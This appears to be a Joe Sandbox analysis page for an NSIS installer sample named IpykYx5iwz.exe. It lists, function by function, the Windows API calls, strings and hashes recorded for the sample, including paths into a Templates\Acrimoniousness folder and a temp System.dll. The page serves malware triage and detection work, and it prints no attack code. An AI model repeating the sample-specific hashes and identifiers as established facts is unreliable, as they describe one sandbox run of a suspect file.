Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: helsidesannoncen: Installing
API String ID: 3282139019-1051793922
Opcode ID: 41b4c3bc07c357cb4355c5985bfedf11a5f104bf667dfc02683d01159c74e76c
Instruction ID: 7396c87bec48d1de0b65d229f3995359e9ede5a691df1363d58f31033cac92c3
Opcode Fuzzy Hash: 41b4c3bc07c357cb4355c5985bfedf11a5f104bf667dfc02683d01159c74e76c
Instruction Fuzzy Hash: B3C122B1600301EBCB216F61ED89E2B3AB8FB85306F51053EF651B51F1CB7999829B1D

Function 0040395E Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004064D9: GetModuleHandleA.KERNEL32(?,?,?,004033F7,0000000A), ref: 004064EB
Part of subcall function 004064D9: GetProcAddress.KERNEL32(00000000,?), ref: 00406506

lstrcatA.KERNEL32(1033,helsidesannoncen: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,helsidesannoncen: Installing,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IpykYx5iwz.exe",00000000), ref: 004039D9
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness,1033,helsidesannoncen: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,helsidesannoncen: Installing,00000000,00000002,74DF3410), ref: 00403A4E
lstrcmpiA.KERNEL32(?,.exe), ref: 00403A61
GetFileAttributesA.KERNEL32(Call), ref: 00403A6C
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness), ref: 00403AB5

Part of subcall function 0040609F: wsprintfA.USER32 ref: 004060AC

RegisterClassA.USER32(00423EC0), ref: 00403AF2
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403B0A
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B3F
ShowWindow.USER32(00000005,00000000), ref: 00403B75
GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403BA1
GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403BAE
RegisterClassA.USER32(00423EC0), ref: 00403BB7
DialogBoxParamA.USER32(?,00000000,00403CFB,00000000), ref: 00403BD6

Strings

1033, xrefs: 0040397E, 004039D4
.DEFAULT\Control Panel\International, xrefs: 004039C4
"C:\Users\user\Desktop\IpykYx5iwz.exe", xrefs: 00403962
C:\Users\user\AppData\Local\Temp\, xrefs: 00403963
Call, xrefs: 00403A1C, 00403A24, 00403A31, 00403A7B, 00403A81
Control Panel\Desktop\ResourceLocale, xrefs: 00403992
RichEdit, xrefs: 00403BA8
RichEdit20A, xrefs: 00403B99, 00403B9F
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness, xrefs: 004039E8, 004039F0, 00403A88, 00403A8E, 00403A9E
RichEd32, xrefs: 00403B89
RichEd20, xrefs: 00403B7B
helsidesannoncen: Installing, xrefs: 0040398A, 00403990, 004039B5, 004039BE, 004039D3
_Nb, xrefs: 00403AD1, 00403B39
.exe, xrefs: 00403A5B

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\IpykYx5iwz.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$helsidesannoncen: Installing
API String ID: 1975747703-2070757090
Opcode ID: 6b4fe61fd8b1bc1d6988934ffc3da0af0016106810d9f066b8e32a87dcf9b062
Instruction ID: b29c60b9e4819681180a0682236be2a56282820a6c44356677c11e3a39c8f367
Opcode Fuzzy Hash: 6b4fe61fd8b1bc1d6988934ffc3da0af0016106810d9f066b8e32a87dcf9b062
Instruction Fuzzy Hash: 0961D8707406046ED620AF65AD45F273EACDB8574AF40043FF951B22E2CB7D9D068A3D

Function 00402E14 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402E28
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\IpykYx5iwz.exe,00000400), ref: 00402E44

Part of subcall function 00405CDA: GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00405CDE
Part of subcall function 00405CDA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D00

GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IpykYx5iwz.exe,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00402E8D
GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 00402FCF

Strings

Inst, xrefs: 00402EF9
Error launching installer, xrefs: 00402E64
"C:\Users\user\Desktop\IpykYx5iwz.exe", xrefs: 00402E14
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403066
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403018
soft, xrefs: 00402F02
C:\Users\user\AppData\Local\Temp\, xrefs: 00402E1E, 00402FE7
Null, xrefs: 00402F0B
@`, xrefs: 00402E95
C:\Users\user\Desktop\IpykYx5iwz.exe, xrefs: 00402E2E, 00402E3D, 00402E51, 00402E6E
C:\Users\user\Desktop, xrefs: 00402E6F, 00402E74, 00402E7A

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\IpykYx5iwz.exe"$@`$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\IpykYx5iwz.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1674753314
Opcode ID: 4ff25efca784e1cc9ed499d867bd0cc09cb833d32a8a78639c2c43bbf880cacd
Instruction ID: 15cfe338c172b2f14672f474af97282dc626767e8c2a942c813fbe846372f848
Opcode Fuzzy Hash: 4ff25efca784e1cc9ed499d867bd0cc09cb833d32a8a78639c2c43bbf880cacd
Instruction Fuzzy Hash: C271B271A00208ABDB20EF74ED89BAE7BB8EB44355F51403BE910B62D1D77C9E418B5C

Function 00406163 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040628E
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,004052A0,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000), ref: 004062A1
SHGetSpecialFolderLocation.SHELL32(004052A0,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,004052A0,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000), ref: 004062DD
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 004062EB
CoTaskMemFree.OLE32(00000000), ref: 004062F7
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040631B
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,004052A0,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 0040636D

Strings

Call, xrefs: 0040618D, 0040625A, 0040625B, 0040625C, 00406278, 0040628D, 004062A0, 004062BC, 004062E7, 0040631A, 00406320, 00406338, 0040634B, 00406366, 0040636C, 00406374, 0040639E
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040625D
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406315
Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll, xrefs: 00406188
r%[, xrefs: 00406170

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$r%[
API String ID: 717251189-1455032328
Opcode ID: bc87b3e97bb764acd918afca442ef092ef133b7939c8ef98f3bffe60c9072dc7
Instruction ID: 216e8927814ca7a9437579cdf690648b6b4dd304440a75ce87bcc4b513c9caea
Opcode Fuzzy Hash: bc87b3e97bb764acd918afca442ef092ef133b7939c8ef98f3bffe60c9072dc7
Instruction Fuzzy Hash: B661F431900215AEDF209F24D8917BE3BA4AB46314F52413FED53B62D1C73C4966CB8E

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00406141: lstrcpynA.KERNEL32(?,?,00000400,00403456,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040614E

Part of subcall function 00405268: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
Part of subcall function 00405268: lstrlenA.KERNEL32(00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
Part of subcall function 00405268: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00402DEC,00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000), ref: 004052C4
Part of subcall function 00405268: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll), ref: 004052D6
Part of subcall function 00405268: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
Part of subcall function 00405268: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
Part of subcall function 00405268: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness, xrefs: 00401786
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll, xrefs: 00401826, 00401842
C:\Users\user\AppData\Local\Temp\nsz7B51.tmp, xrefs: 004017A3, 00401812, 00401830

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp$C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness$Call
API String ID: 1941528284-1398721898
Opcode ID: 3977d18ed3adfd87aea9d22c3e155ed73dce7875c8c0f0fc94715b3dcf40bbd7
Instruction ID: 0d7b692f0969cc6c48ecd1773d7bef120b43cce909374c5328822aabc6167b55
Opcode Fuzzy Hash: 3977d18ed3adfd87aea9d22c3e155ed73dce7875c8c0f0fc94715b3dcf40bbd7
Instruction Fuzzy Hash: 5041EA31904514BACF107FB5CC85DAF3675DF01368B21823BF422F11E2D67C8A518A6D

Function 00405268 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
lstrlenA.KERNEL32(00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00402DEC,00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000), ref: 004052C4
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll), ref: 004052D6
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll, xrefs: 00405288, 0040529A, 004052A0, 004052C3, 004052CF

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll
API String ID: 2531174081-1287030649
Opcode ID: 2f96d13f7099a24f0d018df83f359bf90dc184b4bf3a12aab0b4e7de8e6cc458
Instruction ID: 33e4e25cccf7abea72a497d718f2df9cdca22d62bd402c63bdf8694765fb3fc0
Opcode Fuzzy Hash: 2f96d13f7099a24f0d018df83f359bf90dc184b4bf3a12aab0b4e7de8e6cc458
Instruction Fuzzy Hash: 7A219A71900508BACB119FA5DD81A9EBFB9EF04354F00807AF944B6291C7B98A80CFA8

Function 00402D75 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402D8D
GetTickCount.KERNEL32 ref: 00402DAB
wsprintfA.USER32 ref: 00402DD9

Part of subcall function 00405268: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
Part of subcall function 00405268: lstrlenA.KERNEL32(00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
Part of subcall function 00405268: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00402DEC,00402DEC,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,00000000,00000000,00000000), ref: 004052C4
Part of subcall function 00405268: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll), ref: 004052D6
Part of subcall function 00405268: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
Part of subcall function 00405268: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
Part of subcall function 00405268: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324

CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DFD
ShowWindow.USER32(00000000,00000005), ref: 00402E0B

Part of subcall function 00402D59: MulDiv.KERNEL32(00094DBA,00000064,00096040), ref: 00402D6E

Strings

... %d%%, xrefs: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 287a87dfb5e4d78576b7e5b64b45a7e89b2ba7f01569e9835e7ddccb831194a9
Instruction ID: b553f58f662a8d3b5c132dd9eb473e82ace801a4c3d7fb7af48dab40205e53c4
Opcode Fuzzy Hash: 287a87dfb5e4d78576b7e5b64b45a7e89b2ba7f01569e9835e7ddccb831194a9
Instruction Fuzzy Hash: EC01C430501624EBCB21AB60EF0CEDE77A8EB80705B04013BF905B51E1DBB848568AED

Function 0040572E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405771
GetLastError.KERNEL32 ref: 00405785
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040579A
GetLastError.KERNEL32 ref: 004057A4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405754
C:\Users\user\Desktop, xrefs: 0040572E

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-2028306314
Opcode ID: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
Instruction ID: d10382b71f01f386bba03ee380318ec3e3b09e45dfe00312e2f61c9024105f83
Opcode Fuzzy Hash: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
Instruction Fuzzy Hash: 82010471D10619EADF109FA4DA04BEFBBB8EF14314F00403AD945B6290E77896088FA9

Function 0040646B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406482
wsprintfA.USER32 ref: 004064BB
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064CF

Strings

%s%s.dll, xrefs: 004064B5
\, xrefs: 00406493
UXTHEME, xrefs: 00406474

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
Instruction ID: c390764595a0a4e8c5ef638620d3c4371d91d6a13df4ef9e5d2f3a730445ac55
Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
Instruction Fuzzy Hash: 5DF0F63050061A6BDF149B64DD0DFFB365CAF08305F14047AAA86E20C1EABCD9258B5D

Function 00405D09 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405D1D
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405D37

Strings

nsa, xrefs: 00405D14
"C:\Users\user\Desktop\IpykYx5iwz.exe", xrefs: 00405D09
C:\Users\user\AppData\Local\Temp\, xrefs: 00405D0C

Memory Dump Source

